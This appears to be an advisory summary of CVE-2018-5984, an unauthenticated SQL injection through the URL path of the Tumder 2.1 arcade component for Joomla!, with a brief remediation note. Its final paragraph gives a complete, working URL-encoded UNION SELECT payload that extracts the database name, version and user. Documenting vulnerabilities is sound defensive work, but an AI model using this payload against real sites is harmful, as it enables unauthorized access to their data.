CVE-2018-5984

An attacker sends an HTTP request to the Joomla! site with a malicious SQL payload embedded in the PATH_INFO segment of the URL, specifically under the `category/` route [ref_id=1]. The payload is URL-encoded and includes SQL comment markers, a UNION SELECT statement, and functions such as DATABASE(), VERSION(), and USER() to extract database information [ref_id=1]. No authentication is required; the attacker only needs network access to the web application.

The vulnerability is in the Tumder (An Arcade Games Platform) 2.1 component for Joomla!. The advisory does not specify a particular file or function, but the attack vector is the PATH_INFO parameter passed to the `category/` URI route [ref_id=1].

No patch is provided in the bundle. The advisory does not include a vendor fix or remediation guidance. To close the vulnerability, the application should validate and sanitize all user-supplied input passed via PATH_INFO, preferably by using parameterized queries or prepared statements to prevent SQL injection.

Visit `http://localhost/[PATH]/category/[SQL]` where `[SQL]` is the URL-encoded payload: `%2d%33%20%20%2f%2a%21%30%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%31%31%31%31%41%4c%4c%2a%2f%20%2f%2a%21%30%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%30%78%33%31%2c%30%78%33%32%2c%43%4f%4e%43%41%54%28%44%61%74%61%62%61%73%65%28%29%2c%56%45%52%53%49%4f%4e%28%29%2c%30%78%37%65%2c%44%41%54%41%42%41%53%45%28%29%2c%30%78%37%65%2c%55%53%45%52%28%29%29%2d%2d%20%2d` [ref_id=1].